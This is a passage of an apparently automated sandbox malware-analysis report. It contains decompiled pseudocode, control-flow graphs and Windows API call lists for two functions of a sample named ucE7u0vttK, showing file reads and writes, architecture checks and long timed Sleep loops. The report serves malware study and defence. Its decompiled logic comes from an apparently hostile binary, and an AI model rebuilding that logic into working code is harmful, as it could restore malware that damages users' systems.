    0x0039347d
    0x00393480
    0x0039348a
    0x0039348d
    0x00393495
    0x0039349b
    0x0039349d
    0x0039349f
    0x003934a1
    0x003934a7
    0x003934b1
    0x003934b3
    0x003934b5
    0x003934bb
    0x003934c9
    0x003934ce
    0x003934d1
    0x003934d1
    0x003934d1
    0x003934d1
    0x003934d4
    0x003934dd
    0x003934dd
    0x003934df
    0x003934df
    0x00393455
    0x003934e8
    0x003934f1
    0x003934fc
    0x003934fc
    0x003932e9
    0x003932e9
    0x003932f1
    0x003932f1

    APIs
    • VariantClear.OLEAUT32(?), ref: 00393495
    • SysFreeString.OLEAUT32(?), ref: 003934BB
      • Part of subcall function 003932C0: VariantClear.OLEAUT32(?), ref: 00393352
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(003962AB), ref: 0039337C
      • Part of subcall function 003932C0: SysFreeString.OLEAUT32(?), ref: 003933F6
    Strings
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 003969F0, Relevance: 10.7, APIs: 7, Instructions: 224

    Control-flow Graph

    • Executed
    • Not Executed
    control_flow_graph 825 3969f0-396a13 ??2@YAPAXI@Z 826 396a20 825->826 827 396a15-396a1e call 3970b0 825->827 829 396a22-396a2e ??2@YAPAXI@Z 826->829 827->829 831 396a3b 829->831 832 396a30-396a39 call 3970b0 829->832 834 396a3d-396a67 call 399090 call 393c70 831->834 832->834 840 396a69-396a86 call 399090 call 393c70 834->840 841 396a92-396a97 834->841 852 396a8b-396a90 840->852 842 396a99-396a9f 841->842 843 396ae4-396b0f call 399090 call 39f550 841->843 842->843 845 396aa1-396acc call 3b09a0 call 39bb40 842->845 857 396b28-396b2a 843->857 858 396b11-396b1f call 399020 843->858 845->843 855 396ace-396ad0 845->855 852->841 852->855 860 396ae2 855->860 861 396ad2-396adf call 39cb70 ??3@YAXPAX@Z 855->861 863 396b3c 857->863 864 396b2c-396b39 call 39cb70 ??3@YAXPAX@Z 857->864 866 396b24-396b26 858->866 860->843 861->860 868 396b3e-396b40 863->868 864->863 866->857 866->868 871 396b68-396b6a 868->871 872 396b42-396b44 868->872 873 396c38 871->873 874 396b70 871->874 875 396b4e-396b5c 872->875 876 396b46-396b4c 872->876 877 396c3b-396c3e 873->877 878 396b77-396b7e 874->878 879 396b5e-396b66 call 39cb70 875->879 880 396b90-396ba0 call 392150 875->880 876->875 876->878 882 396c44-396c4c 877->882 878->880 883 396b80-396b87 call 39cb70 878->883 888 396b88-396b8d ??3@YAXPAX@Z 879->888 890 396ba2-396ba9 880->890 891 396bf7-396bfc 880->891 883->888 888->880 890->891 893 396bab 890->893 891->882 892 396bfe-396c00 891->892 894 396c12-396c14 892->894 895 396c02-396c0f call 39cb70 ??3@YAXPAX@Z 892->895 896 396bb0-396bb4 893->896 894->877 898 396c16-396c37 call 39cb70 ??3@YAXPAX@Z 894->898 895->894 899 396bbe-396bc0 896->899 900 396bb6-396bba 896->900 899->891 902 396bc2-396bef call 399090 call 391a80 899->902 900->896 901 396bbc 900->901 901->891 909 396bf4 902->909 909->891
    C-Code - Quality: 92%
    			E003969F0(intOrPtr __eax, intOrPtr _a4, intOrPtr* _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v216;
				void* __ebx;
				void* __edi;
				void* _t48;
				void* _t52;
				void* _t55;
				short* _t59;
				void* _t69;
				void* _t71;
				void* _t77;
				intOrPtr _t79;
				intOrPtr _t85;
				intOrPtr _t112;
				intOrPtr _t114;
				intOrPtr* _t115;
				void* _t119;
				void* _t120;
				void* _t121;
				void* _t122;
				void* _t123;
				void* _t124;

				_t44 = __eax;
				_push(0x34);
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				L0039A47E();
				_t120 = _t119 + 4;
				if(__eax == 0) {
					_t79 = 0;
					__eflags = 0;
				} else {
					_t44 = E003970B0(__eax);
					_t79 = _t44;
				}
				_push(0x34);
				L0039A47E();
				_t121 = _t120 + 4;
				_t127 = _t44;
				if(_t44 == 0) {
					_t112 = 0;
					__eflags = 0;
				} else {
					_t112 = E003970B0(_t44);
				}
				E00399090(_t127,  &_v216, 0xcf);
				_t48 = E00393C70( &_v12,  &_v216,  &_v8,  &_v12); // executed
				_t122 = _t121 + 0x14;
				_t128 = _t48;
				if(_t48 != 0) {
					L8:
					_t49 = _v8;
					if(_v8 != 0) {
						_t94 = _v12;
						if(_v12 > 4) {
							_t71 = E003B09A0(_a4, _t79,  &_v216, _t49, _t94);
							E0039BB40(_v8);
							_t122 = _t122 + 0x18;
							_v8 = 0;
							_v12 = 0;
							if(_t71 == 0) {
								goto L11;
							}
						}
					}
				} else {
					E00399090(_t128,  &_v216, 0x10);
					_t77 = E00393C70( &_v216,  &_v216,  &_v8,  &_v12); // executed
					_t122 = _t122 + 0x14;
					if(_t77 == 0) {
						L11:
						if(_t79 != 0) {
							E0039CB70(_t79, _t79, _t112);
							_push(_t79);
							L00391CB0();
							_t122 = _t122 + 4;
						}
						_t79 = 0;
					} else {
						goto L8;
					}
				}
				E00399090(0,  &_v216, 0x12);
				_t52 = E0039F550( &_v8, 0,  &_v216, 0xa,  &_v8,  &_v12);
				_t123 = _t122 + 0x1c;
				if(_t52 == 0) {
					L16:
					if(_t112 != 0) {
						E0039CB70(_t79, _t112, _t112);
						_push(_t112);
						L00391CB0();
						_t123 = _t123 + 4;
					}
					_t112 = 0;
				} else {
					_t69 = E00399020(_t112, _a4, _v8, _v12); // executed
					if(_t69 == 0) {
						goto L16;
					}
				}
				if(_t79 == 0) {
					__eflags = _t112;
					if(_t112 == 0) {
						_t114 = _v16;
						goto L43;
					} else {
						_v16 = 1;
						goto L26;
					}
				} else {
					if(_t112 == 0 ||  *((intOrPtr*)(_t79 + 0x10)) >  *((intOrPtr*)(_t112 + 0x10))) {
						_v16 = 2;
						 *_a8 = _t79;
						_t142 = _t112;
						if(_t112 != 0) {
							E0039CB70(_t79, _t112, _t112);
							_push(_t112);
							goto L28;
						}
					} else {
						L26:
						 *_a8 = _t112;
						__eflags = _t79;
						if(__eflags != 0) {
							E0039CB70(_t79, _t79, _t112);
							_push(_t79);
							L28:
							L00391CB0();
							_t123 = _t123 + 4;
						}
					}
					_t115 = _a8;
					_t55 = E00392150(_t142,  *_t115); // executed
					_t124 = _t123 + 4;
					if(_t55 == 0) {
						_t59 =  *((intOrPtr*)( *_t115 + 0x14));
						if(_t59 != 0) {
							_t85 = 0x7fffffff;
							while( *_t59 != 0) {
								_t59 = _t59 + 2;
								_t85 = _t85 - 1;
								if(_t85 != 0) {
									continue;
								} else {
								}
								goto L37;
							}
							__eflags = _t85;
							if(_t85 != 0) {
								_t117 = 0x7fffffff - _t85;
								__eflags = 0x7fffffff;
								E00399090(0x7fffffff,  &_v216, 0xcd);
								_t37 = _t117 + 2; // 0x80000001
								E00391A80( &_v216,  &_v216,  *((intOrPtr*)( *_a8 + 0x14)), 0x7fffffff - _t85 + _t37); // executed
								_t124 = _t124 + 0x14;
							}
						}
					}
					L37:
					_t114 = _v16;
					if(_t114 != 0) {
						L44:
						return _t114;
					} else {
						if(_t79 != 0) {
							E0039CB70(_t79, _t79, _t112);
							_push(_t79);
							L00391CB0();
							_t124 = _t124 + 4;
						}
						if(_t112 == 0) {
							L43:
							 *_a8 = 0;
							goto L44;
						} else {
							E0039CB70(_t79, _t112, _t112);
							_push(_t112);
							L00391CB0();
							 *_a8 = 0;
							return _t114;
						}
					}
				}
			}



























    0x003969f0
    0x003969fe
    0x00396a00
    0x00396a03
    0x00396a06
    0x00396a09
    0x00396a0e
    0x00396a13
    0x00396a20
    0x00396a20
    0x00396a15
    0x00396a17
    0x00396a1c
    0x00396a1c
    0x00396a22
    0x00396a24
    0x00396a29
    0x00396a2c
    0x00396a2e
    0x00396a3b
    0x00396a3b
    0x00396a30
    0x00396a37
    0x00396a37
    0x00396a49
    0x00396a5d
    0x00396a62
    0x00396a65
    0x00396a67
    0x00396a92
    0x00396a92
    0x00396a97
    0x00396a99
    0x00396a9f
    0x00396aaf
    0x00396aba
    0x00396ac1
    0x00396ac4
    0x00396ac7
    0x00396acc
    0x00000000
    0x00000000
    0x00396acc
    0x00396a9f
    0x00396a69
    0x00396a72
    0x00396a86
    0x00396a8b
    0x00396a90
    0x00396ace
    0x00396ad0
    0x00396ad4
    0x00396ad9
    0x00396ada
    0x00396adf
    0x00396adf
    0x00396ae2
    0x00000000
    0x00000000
    0x00000000
    0x00396a90
    0x00396aed
    0x00396b05
    0x00396b0a
    0x00396b0f
    0x00396b28
    0x00396b2a
    0x00396b2e
    0x00396b33
    0x00396b34
    0x00396b39
    0x00396b39
    0x00396b3c
    0x00396b11
    0x00396b1f
    0x00396b26
    0x00000000
    0x00000000
    0x00396b26
    0x00396b40
    0x00396b68
    0x00396b6a
    0x00396c38
    0x00000000
    0x00396b70
    0x00396b70
    0x00000000
    0x00396b70
    0x00396b42
    0x00396b44
    0x00396b51
    0x00396b58
    0x00396b5a
    0x00396b5c
    0x00396b60
    0x00396b65
    0x00000000
    0x00396b65
    0x00396b77
    0x00396b77
    0x00396b7a
    0x00396b7c
    0x00396b7e
    0x00396b82
    0x00396b87
    0x00396b88
    0x00396b88
    0x00396b8d
    0x00396b8d
    0x00396b7e
    0x00396b90
    0x00396b96
    0x00396b9b
    0x00396ba0
    0x00396ba4
    0x00396ba9
    0x00396bab
    0x00396bb0
    0x00396bb6
    0x00396bb9
    0x00396bba
    0x00000000
    0x00000000
    0x00396bbc
    0x00000000
    0x00396bba
    0x00396bbe
    0x00396bc0
    0x00396bd3
    0x00396bd3
    0x00396bd5
    0x00396bdf
    0x00396bef
    0x00396bf4
    0x00396bf4
    0x00396bc0
    0x00396ba9
    0x00396bf7
    0x00396bf7
    0x00396bfc
    0x00396c45
    0x00396c4c
    0x00396bfe
    0x00396c00
    0x00396c04
    0x00396c09
    0x00396c0a
    0x00396c0f
    0x00396c0f
    0x00396c14
    0x00396c3b
    0x00396c3e
    0x00000000
    0x00396c16
    0x00396c18
    0x00396c1d
    0x00396c1e
    0x00396c2d
    0x00396c37
    0x00396c37
    0x00396c14
    0x00396bfc

    APIs
    • ??2@YAPAXI@Z.MSVCRT ref: 00396A09
    • ??2@YAPAXI@Z.MSVCRT ref: 00396A24
      • Part of subcall function 00393C70: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,00000000,?,?,?,003A14F1,?,00391BCA,?), ref: 00393C9E
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CBB
      • Part of subcall function 00393C70: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000000,?,003A14F1,?,00391BCA,?,?,000000B3,00000000,?,?), ref: 00393CD0
      • Part of subcall function 00393C70: ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?), ref: 00393D08
    • ??3@YAXPAX@Z.MSVCRT ref: 00396C1E
      • Part of subcall function 0039BB40: HeapFree.KERNEL32(00290000,00000008,003A04E6), ref: 0039BB53
    • ??3@YAXPAX@Z.MSVCRT ref: 00396ADA
    • ??3@YAXPAX@Z.MSVCRT ref: 00396B34
    • ??3@YAXPAX@Z.MSVCRT ref: 00396B88
      • Part of subcall function 00391A80: CreateFileW.KERNEL32(?,C0000000,00000001,00000000,00000002,00000080,00000000,0000001F,00000000,00391BCA,?,003A171D,?,00391BCA,?,?), ref: 00391AAB
      • Part of subcall function 00391A80: WriteFile.KERNEL32(00000000,?,00391BCA,000000CC,00000000,?,003A171D,?,00391BCA,?,?,000000CC), ref: 00391ACD
    • ??3@YAXPAX@Z.MSVCRT ref: 00396C0A
      • Part of subcall function 0039CB70: SysFreeString.OLEAUT32(?), ref: 0039CB81
    Memory Dump Source
    • Source File: 00000004.00000002.14087304030.00391000.00000020.sdmp, Offset: 00390000, based on PE: true
    • Associated: 00000004.00000002.14087287207.00390000.00000002.sdmp
    • Associated: 00000004.00000002.14087337379.003B3000.00000002.sdmp
    • Associated: 00000004.00000002.14087356259.003B8000.00000004.sdmp
    • Associated: 00000004.00000002.14087371766.003B9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_4_2_390000_ucE7u0vttK.jbxd
    Function 0039FC18, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 145sleep

    Control-flow Graph

    C-Code - Quality: 56%
    			E0039FC18() {
				int _t200;
				int _t202;
				int _t204;
				void* _t210;
				void* _t211;
				signed int* _t216;
				int _t225;
				void* _t227;
				long _t228;
				intOrPtr _t229;
				long _t230;
				void* _t233;
				long _t240;
				int _t249;
				long _t251;
				long _t255;
				long _t256;
				long _t258;
				long _t261;
				void* _t263;
				long _t267;
				int _t268;
				long _t270;
				long _t272;
				long _t273;
				long _t274;
				long _t275;
				long _t279;
				long _t280;
				long _t284;
				long _t286;
				int _t292;
				long _t298;
				long _t300;
				long _t301;
				long _t303;
				long _t313;
				long _t318;
				intOrPtr _t319;
				int _t320;
				signed int* _t334;
				int _t336;
				signed int _t351;
				int _t355;
				signed int _t369;
				signed int _t385;
				long _t390;
				int _t405;
				signed int _t407;
				int _t419;
				int _t420;
				int _t422;
				int _t423;
				int _t424;
				signed short* _t425;
				int _t434;
				signed int _t435;
				int _t440;
				int _t446;
				signed int _t448;
				signed int _t455;
				int _t457;
				int _t459;
				void* _t460;
				void* _t461;
				void* _t463;
				long _t464;
				void* _t466;
				void* _t467;
				void* _t468;
				void* _t471;
				void* _t473;
				void* _t474;
				void* _t475;
				void* _t480;

				do {
					_t336 =  *0x3b8628; // 0x593938
					 *(_t466 - 0x14) =  *(_t466 - 0x14) +  *((intOrPtr*)( *((intOrPtr*)(_t336 + 0x30))))();
					asm("adc [ebp-0x10], ecx");
					Sleep(1); // executed
				} while (_t461 - 1 > _t333);
				_t200 =  *0x3b8628; // 0x593938
				 *0x3b85dc = _t333;
				 *0x3b85f8 = _t333;
				 *0x3b85fc = _t333;
				 *0x3b85c8 = _t333;
				 *((intOrPtr*)( *((intOrPtr*)(_t200 + 0xbc))))(_t333, _t466 - 0x9c0, 0x200);
				_t202 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1e8))))(_t466 - 0x9c0);
				_t204 =  *0x3b8628; // 0x593938
				 *((intOrPtr*)( *((intOrPtr*)(_t204 + 0x1d8))))(_t466 - 0x9c0);
				SetCurrentDirectoryW(_t466 - 0x9c0);
				_t419 =  *0x3b8628; // 0x593938
				srand( *((intOrPtr*)( *((intOrPtr*)(_t419 + 0xd0))))());
				_t468 = _t467 + 4; // executed
				_t210 = E0039EB30(); // executed
				_t211 = E0039BAF0(_t210);
				_t478 = _t211;
				if(_t211 == 0) {
					L89:
					_t480 =  *0x3b85ac - _t333; // 0x0
					if(_t480 == 0) {
						L102:
						E00399480();
						E00397E10();
						ExitProcess(_t333);
					}
					_t420 =  *0x3b8628; // 0x593938
					_t463 = 0;
					 *((intOrPtr*)(_t466 - 0x70)) = 0;
					 *((intOrPtr*)(_t466 - 0x6c)) = 0;
					 *((intOrPtr*)(_t466 - 0x68)) = 0;
					 *((intOrPtr*)(_t466 - 0x64)) = 0;
					 *(_t466 - 0x18) = 0;
					 *((intOrPtr*)(_t466 - 0xb8)) = 0x44;
					 *((intOrPtr*)( *((intOrPtr*)(_t420 + 0xb8))))(_t466 - 0xb8);
					E00398030(_t466 - 0x18);
					_t216 = E003A1D90(0x20a, 0);
					_t334 = _t216;
					if(_t334 == 0) {
						L101:
						_t422 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t422 + 0xd8))))( *(_t466 - 0x18), _t463, _t463, _t463, _t463, _t463, _t463, _t334, _t466 - 0xb8, _t466 - 0x70);
						_t423 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t423 + 0xf8))))( *((intOrPtr*)(_t466 - 0x70)));
						_t424 =  *0x3b8628; // 0x593938
						 *((intOrPtr*)( *((intOrPtr*)(_t424 + 0xf8))))( *((intOrPtr*)(_t466 - 0x6c)));
						E0039BB40( *(_t466 - 0x18));
						_t333 = 0;
						goto L102;
					}
					_t425 =  *(_t466 - 0x18);
					_t464 = 0x104;
					_t460 = 0;
					while(1) {
						_t187 = _t464 + 0x7ffffefa; // 0x7ffffffe
						if(_t187 == 0) {
							break;
						}
						_t351 =  *_t425 & 0x0000ffff;
						if(_t351 == 0) {
							break;
						}
						 *_t216 = _t351;
						_t216 =  &(_t216[0]);
						_t425 =  &(_t425[1]);
						_t464 = _t464 - 1;
						if(_t464 != 0) {
							continue;
						}
						L97:
						_t216 = _t216 - 2;
						_t460 = 0x8007007a;
						L98:
						 *_t216 = 0;
						if(_t460 >= 0) {
							_t225 =  *0x3b8628; // 0x593938
							 *((intOrPtr*)( *((intOrPtr*)(_t225 + 0x1e8))))(_t334);
						}
						_t463 = 0;
						goto L101;
					}
					__eflags = _t464;
					if(_t464 != 0) {
						goto L98;
					}
					goto L97;
				}
				_t227 = E00393500(_t466 - 4, _t478); // executed
				_t479 = _t227;
				if(_t227 == 0) {
					 *(_t466 - 0x34) = _t333;
					_t228 = GetCurrentProcess();
					__imp__IsWow64Process(_t228, _t466 - 0x34);
					__eflags = _t228;
					if(_t228 != 0) {
						E0039E7D0(_t466 - 0x9c0,  *(_t466 - 0x34)); // executed
						_t468 = _t468 + 8;
					}
					_t229 = E003B1210();
					_push(8);
					 *0x3b8580 = _t229;
					L0039A47E();
					_t468 = _t468 + 4;
					__eflags = _t229 - _t333;
					if(_t229 == _t333) {
						_t465 = 0;
						__eflags = 0;
					} else {
						_t465 = E0039E850(_t229);
					}
					_t230 = E00393D50(_t465); // executed
					__eflags = _t230;
					if(_t230 != 0) {
						__eflags = _t465 - _t333;
						if(__eflags != 0) {
							E00392420(_t465);
							_push(_t465);
							L00391CB0();
							_t468 = _t468 + 4;
						}
						_t355 =  *0x3b8628; // 0x593938
						 *0x3b8570 = _t333;
						 *0x3b8584 = _t333;
						 *0x3b8574 = _t333;
						 *0x3b8578 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t355 + 0xcc))))(0x3b8594, 0x800);
						E00391B20(_t466 - 0x5c0,  *((intOrPtr*)(_t355 + 0xcc)), __eflags);
						_t233 = E0039BB30(_t466 - 0xc);
						_push(0x34);
						 *(_t466 - 0x58) = _t333;
						 *(_t466 - 0x28) = _t333;
						L0039A47E();
						_t471 = _t468 + 4;
						__eflags = _t233 - _t333;
						if(__eflags == 0) {
							 *(_t466 - 0x5b8) = _t333;
						} else {
							 *(_t466 - 0x5b8) = E003970B0(_t233);
						}
						E00399090(__eflags, _t466 - 0x9c0, 3);
						E0039F550(_t466 - 0x50, _t333, _t466 - 0x9c0, 0xa, _t466 - 0x54, _t466 - 0x50);
						E00391F00(_t466 - 0xc,  *((intOrPtr*)(_t466 - 0x54)),  *((intOrPtr*)(_t466 - 0x50))); // executed
						_t240 = E003969F0(_t466 - 0x5b8, _t466 - 0xc, _t466 - 0x5b8); // executed
						_t468 = _t471 + 0x24;
						__eflags = _t240;
						if(_t240 != 0) {
							 *(_t466 - 0x5c0) = _t466 - 0xc;
							__eflags = E003A0AD0(_t466 - 0x5c0,  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x14)));
							if(__eflags == 0) {
								goto L18;
							}
							E00395700( *((intOrPtr*)(_t466 - 0x5bc)), __eflags);
							 *0x3b85ac = _t333;
							 *(_t466 - 0x30) = _t333;
							 *(_t466 - 0x2c) = _t333;
							 *(_t466 - 0x14) = _t333;
							 *(_t466 - 0x10) = _t333;
							 *(_t466 - 0x3c) = _t333;
							 *(_t466 - 0x38) = _t333;
							 *(_t466 - 0x44) = _t333;
							 *(_t466 - 0x40) = _t333;
							 *((intOrPtr*)( *( *0x3b8628)))(_t333, _t333, E003B08A0, _t466 - 0x5c0, _t333, _t466 - 0x74);
							 *(_t466 - 0x24) = _t333;
							while(1) {
								_t249 =  *(_t466 - 0x5b8);
								_t369 = 0;
								 *0x3b857c = 0;
								 *(_t466 - 0x20) = _t333;
								__eflags =  *((intOrPtr*)(_t249 + 0x18)) - _t333;
								if(__eflags <= 0) {
									goto L85;
								}
								do {
									_t434 =  *( *((intOrPtr*)(_t249 + 0x20)) + _t369 * 4);
									_t255 = L003994D0(_t466 - 0x5c0,  *((intOrPtr*)( *((intOrPtr*)(_t249 + 0x1c)) + _t369 * 4)), _t434); // executed
									__eflags = _t255;
									if(_t255 != 0) {
										__imp___time64(_t333);
										_t459 = _t434;
										_t435 =  *0x3b857c; // 0x1
										_t473 = _t468 + 4;
										_t465 = _t255;
										_t256 = _t255 -  *((intOrPtr*)( *((intOrPtr*)( *(_t466 - 0x5b8) + 0x24)) + _t435 * 8));
										__eflags = _t256;
										asm("sbb ebx, [ecx+edx*8+0x4]");
										 *(_t466 - 0x48) = _t459;
										if(__eflags < 0) {
											L33:
											_t333 = 0; // executed
											_t258 = E003A1B80(_t465, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x28); // executed
											_t468 = _t473 + 0xc;
											__eflags = _t258;
											if(_t258 == 0) {
												 *(_t466 - 0x20) =  *(_t466 - 0x20) + 1;
												 *( *((intOrPtr*)(_t466 - 0x5bc)) + 0xc) =  *(_t466 - 0x28);
												_t261 = _t465 -  *(_t466 - 0x3c);
												__eflags = _t261;
												asm("sbb edx, [ebp-0x38]");
												 *(_t466 - 0x48) = _t459;
												if(__eflags < 0) {
													L42:
													E003942A0(__eflags, _t466 - 0x5c0); // executed
													_t474 = _t468 + 4;
													_t263 = E003A12C0(); // executed
													_push(4);
													__eflags = _t263 - _t333;
													if(__eflags >= 0) {
														if(__eflags != 0) {
															_push(_t466 - 0x9c0);
															E00399090(__eflags);
															E00399090(__eflags, _t466 - 0xdc0, 7);
															_push(_t466 - 0xdc0);
															_push(_t466 - 0x9c0);
															_push(0xe);
															_t440 = _t466 - 0x5c0;
															_push(_t440); // executed
														} else {
															_push(_t466 - 0x9c0);
															E00399090(__eflags);
															E00399090(__eflags, _t466 - 0xdc0, 6);
															_push(_t466 - 0xdc0);
															_t440 = _t466 - 0x9c0;
															_push(_t440);
															_push(0xe);
															_push(_t466 - 0x5c0);
														}
													} else {
														_push(_t466 - 0x9c0);
														E00399090(__eflags);
														E00399090(__eflags, _t466 - 0xdc0, 5);
														_t440 = _t466 - 0xdc0;
														_push(_t440);
														_push(_t466 - 0x9c0);
														_push(0xe);
														_push(_t466 - 0x5c0);
													}
													_t267 = E00395A10(); // executed
													_t475 = _t474 + 0x20;
													 *(_t466 - 0x48) = _t333;
													do {
														__imp___time64(0);
														_t465 = _t267;
														_t268 =  *0x3b8570; // 0x0
														_t468 = _t475 + 4;
														_t459 = _t440;
														__eflags = _t268 - 2;
														if(_t268 == 2) {
															L52:
															_t270 = E003936E0(_t459, _t465, _t466 - 0xc, _t466 - 0x5c0,  *(_t466 - 0x14),  *(_t466 - 0x10)); // executed
															_t468 = _t468 + 0x10;
															asm("sbb edx, 0x0");
															 *(_t466 - 0x14) = _t465 - 0x708;
															 *(_t466 - 0x10) = _t459;
															__eflags = _t270 - 1;
															if(_t270 == 1) {
																 *0x3b85ac = _t270;
															}
															L54:
															_t272 = _t465 -  *(_t466 - 0x44);
															__eflags = _t272;
															asm("sbb ecx, [ebp-0x40]");
															 *(_t466 - 0x5c) = _t459;
															if(__eflags < 0) {
																L61:
																_t465 = _t465 -  *(_t466 - 0x30);
																__eflags = _t465;
																asm("sbb edi, [ebp-0x2c]");
																 *(_t466 - 0x5c) = _t459;
																if(__eflags < 0) {
																	L68:
																	_t273 = E00399890( *((intOrPtr*)(_t466 - 0x5bc)));
																	__eflags = _t273;
																	if(_t273 == 0) {
																		L83:
																		_t333 = 0;
																		__eflags = 0;
																		goto L84;
																	}
																	_push(1);
																	_push(_t466 - 0x5c0);
																	_t274 = E00395A10();
																	_t468 = _t468 + 8;
																	__eflags = _t274;
																	if(__eflags == 0) {
																		goto L83;
																	}
																	_t440 = _t466 - 0x5c0;
																	_t275 = E00397560(_t333, __eflags, _t440);
																	_t468 = _t468 + 4;
																	__eflags = _t275;
																	if(_t275 == 0) {
																		__eflags =  *0x3b85ac;
																		if( *0x3b85ac != 0) {
																			L88:
																			E00391700(_t466 - 0xc);
																			E0039F850(_t333, _t466 - 0x5c0);
																			E0039C930(_t466 - 4);
																			_t333 = 0;
																			__eflags = 0;
																			goto L89;
																		}
																		goto L83;
																	}
																	__eflags =  *0x3b85ac;
																	if( *0x3b85ac != 0) {
																		goto L88;
																	}
																	_t279 =  *0x3b8584; // 0x1
																	_t465 = 0xa;
																	__eflags = _t279;
																	if(_t279 == 0) {
																		_t280 =  *(_t466 - 0x24);
																		__eflags = _t280;
																		if(_t280 <= 0) {
																			while(1) {
																				L76:
																				_t390 =  *0x3b8584; // 0x1
																				__eflags = _t390;
																				if(_t390 != 0) {
																					goto L78;
																				}
																				_t440 =  *0x3b8628; // 0x593938
																				 *((intOrPtr*)( *((intOrPtr*)(_t440 + 0xc8))))(0x4e20);
																				_t465 = _t465 - 1;
																				__eflags = _t465;
																				if(_t465 > 0) {
																					continue;
																				}
																				goto L78;
																			}
																			goto L78;
																		}
																		L75:
																		_t284 = _t280 - 1;
																		__eflags = _t284;
																		 *(_t466 - 0x24) = _t284;
																		_t465 = 1;
																		goto L76;
																	}
																	_t158 = _t465 - 5; // 0x5
																	_t280 = _t158;
																	 *0x3b8584 = 0;
																	goto L75;
																}
																if(__eflags > 0) {
																	L64:
																	_t465 = E0039F2D0(_t466 - 0x5c0);
																	_t286 = E003999A0(_t333, _t466 - 0x19, _t459, _t285, _t285);
																	_push(8);
																	__eflags = _t286;
																	if(__eflags == 0) {
																		_push(_t466 - 0x9c0);
																		E00399090(__eflags);
																		E00399090(__eflags, _t466 - 0xdc0, 0xa);
																		_push(_t466 - 0xdc0);
																		_t446 = _t466 - 0x9c0;
																		_push(_t446);
																		_push(0xe);
																		_push(_t466 - 0x5c0);
																	} else {
																		_push(_t466 - 0x9c0);
																		E00399090(__eflags);
																		E00399090(__eflags, _t466 - 0xdc0, 9);
																		_t446 = _t466 - 0xdc0;
																		_push(_t446);
																		_push(_t466 - 0x9c0);
																		_push(0xe);
																		_push(_t466 - 0x5c0);
																	}
																	E00395A10();
																	_t292 = E0039BB40(_t465);
																	__imp___time64(0);
																	_t468 = _t468 + 0x28;
																	 *(_t466 - 0x30) = _t292;
																	 *(_t466 - 0x2c) = _t446;
																	goto L68;
																}
																__eflags = _t465 - 0x7080;
																if(_t465 <= 0x7080) {
																	goto L68;
																}
																goto L64;
															}
															if(__eflags > 0) {
																L57:
																_t448 =  *0x3b857c; // 0x1
																_t298 = _t465 -  *((intOrPtr*)( *((intOrPtr*)( *(_t466 - 0x5b8) + 0x28)) + _t448 * 8));
																__eflags = _t298;
																_t333 = _t459;
																asm("sbb ebx, [ecx+edx*8+0x4]");
																 *(_t466 - 0x5c) = _t459;
																if(__eflags < 0) {
																	goto L61;
																}
																if(__eflags > 0) {
																	L60:
																	 *(_t466 - 0x44) = _t465;
																	 *(_t466 - 0x40) = _t459;
																	_t300 = E00391FE0(_t333, _t459, _t465, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x5b8); // executed
																	_t468 = _t468 + 0xc;
																	__eflags = _t300;
																	if(_t300 != 0) {
																		_t301 = E003A0AD0(_t466 - 0x5c0,  *((intOrPtr*)( *(_t466 - 0x5b8) + 0x14)));
																		__eflags = _t301;
																		if(_t301 == 0) {
																			goto L88;
																		}
																		 *0x3b857c = 0;
																		goto L83;
																	}
																	goto L61;
																}
																__eflags = _t298 - 0x3840;
																if(_t298 <= 0x3840) {
																	goto L61;
																}
																goto L60;
															}
															__eflags = _t272 - 0x4b0;
															if(_t272 <= 0x4b0) {
																goto L61;
															}
															goto L57;
														}
														_t303 = _t465 -  *(_t466 - 0x14);
														__eflags = _t303;
														asm("sbb ecx, [ebp-0x10]");
														 *(_t466 - 0x5c) = _t459;
														if(__eflags < 0) {
															goto L54;
														}
														if(__eflags > 0) {
															goto L52;
														}
														__eflags = _t303 - 0xe10;
														if(_t303 <= 0xe10) {
															goto L54;
														}
														goto L52;
														L78:
														_t267 =  *(_t466 - 0x48) + 1;
														 *(_t466 - 0x48) = _t267;
														__eflags = _t267 - 0x64;
													} while (_t267 < 0x64);
													goto L83;
												}
												if(__eflags > 0) {
													L40:
													_t313 = E0039AC90( *(_t466 - 0x5b8), _t466 - 0x5c0); // executed
													_t468 = _t468 + 8;
													__eflags = _t313;
													if(__eflags == 0) {
														goto L84;
													}
													 *(_t466 - 0x3c) = _t465;
													 *(_t466 - 0x38) = _t459;
													goto L42;
												}
												__eflags = _t261 - 0xe10;
												if(__eflags <= 0) {
													goto L42;
												}
												goto L40;
											}
											__eflags = _t258 - 1;
											if(_t258 != 1) {
												E0039C870(_t466 - 0x5c0, _t258);
												_t468 = _t468 + 8;
											}
											_t405 =  *0x3b8628; // 0x593938
											 *((intOrPtr*)( *((intOrPtr*)(_t405 + 0xc8))))(0x3e8);
											goto L84;
										}
										if(__eflags > 0) {
											L28:
											_t318 = E0039D890(_t465, __eflags, _t466 - 0xc, _t466 - 0x5c0, _t466 - 0x58); // executed
											_t473 = _t473 + 0xc;
											__eflags = _t318;
											if(_t318 == 0) {
